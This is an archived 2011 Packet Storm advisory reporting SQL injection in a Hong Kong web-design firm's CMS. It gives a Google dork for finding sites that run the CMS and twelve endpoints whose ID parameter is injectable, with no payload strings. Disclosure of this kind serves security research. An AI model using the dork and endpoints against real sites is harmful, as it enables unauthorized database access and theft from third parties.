Hong Kong Firms Internet Services CMS SQL Injection

2011-07-31T00:00:00
ID PACKETSTORM:103608
Type packetstorm
Reporter Netrondoank
Modified 2011-07-31T00:00:00

Description

                                        
                                            `.__.__ .__ __   
|__| | _____ __ __| |__ _____ ____ | | __ ___________   
| | | / \| | \ | \\__ \ _/ ___\| |/ // __ \_ __ \  
| | |_| Y Y \ | / Y \/ __ \\ \___| <\ ___/| | \/  
|__|____/__|_| /____/|___| (____ /\___ >__|_ \\___ >__|   
\/ \/ \/ \/ \/ \/   
.org  
################################ Archieve an Resource About Hacking ###############  
#################### ####################  
#  
# Exploit Title: Hong Kong Firms Internet Services CMS Sql Injection Vulnerability  
# Author: Netrondoank Aka netron  
# home Page: http://www.ilmuhacker.org  
# Forum : http://www.indonesiansecurity.info  
# Vendor or Software Link: http://www.h-k.com.hk  
# Version: N/A  
# Category:: webapps  
# Google dork: "Powered by Hong Kong Firms Internet Services"  
# Tested on: Linux Back Track 5  
  
####################################################################  
# Proof Of Concept [POC]  
  
http://site/newsdetail.php?ID=[sqli]  
http://site/bespoke/events2.php?ID=[sqli]  
http://site/news-detail.php?ID=[sqli]  
http://site/productdetail.php?ID=[sqli]  
http://site/service.php?ID=[sqli]  
http://site/detail.php?ID=[sqli]  
http://site/e-detail.php?ID=[sqli]  
http://site/product-detail.php?ID=[sqli]  
http://site/productdetail.php?ID=[sqli]  
http://site/newsletterdetail.php?ID=[sqli]  
http://site/servicedetail.php?ID=[sqli]  
http://site/shop-detail.php?ID=[sqli]  
  
#########################################################################################  
#Greetz To:  
Allah swt .free dom For Palestine .Indonesiansecurity.info, 1337day.com  
packetstormsecurity.org, Exploit-id.com ,securityreason.com ,securityfocus.com  
##########################################################################################  
############################### Archieve an Resource About Hacking--Ilmuhackerdotorg ####  
`